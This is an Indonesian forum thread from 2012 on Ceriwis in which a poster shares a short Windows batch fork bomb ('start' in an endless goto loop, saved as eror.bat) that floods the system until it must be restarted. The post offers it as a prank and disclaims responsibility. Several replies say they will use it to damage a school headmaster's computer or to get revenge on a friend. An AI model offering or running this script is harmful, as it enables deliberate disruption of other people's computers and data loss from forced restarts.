Ceriwis

Ceriwis (https://forum.ceriwis.com/forum.php)
-   Lounge (https://forum.ceriwis.com/forumdisplay.php?f=9)
-   -   Cara bagus buat ngerorin komputer (https://forum.ceriwis.com/showthread.php?t=1007159)

kembangtahu 27th May 2012 06:27 PM

Cara bagus buat ngerorin komputer
 
~WELCOME TO MY THREAD!

:rate5:rate5:rate5



[/quote]
Quote:






Baik agan dan sista mungkin ini adalah thread

terpendek yang pernah ane buat. Di sini ane mau ngeshare

cara bagus ngerorin komputer sampe satu"nya cara adalah di-RESTARThttp://static.kaskus.co.id/images/sm...s_sm_peace.gif





Yuk langsung aja, gini caranya gan :


[/spoiler]
Spoiler for open this:
Spoiler for open this:
for Caranya:




1. Buka Notepad lalu copy


Spoiler for open this:
Spoiler for open this:
for Copy:




@echo off

: begin

start

goto begin








2. Terus save namanya eror.bat









kalo kompi agan sampe kenapa-napa itu diluar tanggung jawab TS:ngakak:





SEKIAN

Spoiler for open this:
Spoiler for open this:
for Sekian:




Kalo Berkenan Kasih Ane :melonndan::melonndan::melonndan:









Tambahan...


Spoiler for open this:
Spoiler for open this:
for Lupa:




:rate5:rate5 Jangan lupa!







:loveindonesia:loveindonesia:ceriwislove: :ceriwislove:http://ceri.ws/smilies/nosara.gif:2good:



ENTAR KALO BANYAK YG NGOMEN ANE UPDATE LAGI




[spoiler=open this] for Komen Para ceriwiser:







Quote:







Originally Posted by albadri
http://static.kaskus.co.id/images/buttons/viewpost.gif


lumayan nih buar ngerusak kompi kepala sekolah ane yang pelit tq gan nice info :2good:







Quote:







Originally Posted by nejihyuga98
http://static.kaskus.co.id/images/buttons/viewpost.gif


wew , lumayan nih buat balas dendam sama temen ane







Quote:







Originally Posted by waHyuyuwono
http://static.kaskus.co.id/images/buttons/viewpost.gif


saran ane buat yang mau coba...

"jangan coba dikomputer agan "








[quote]






Originally Posted by Cbell
http://static.kaskus.co.id/images/buttons/viewpost.gif


makasih infonya gan














</div>


All times are GMT +7. The time now is 06:13 AM.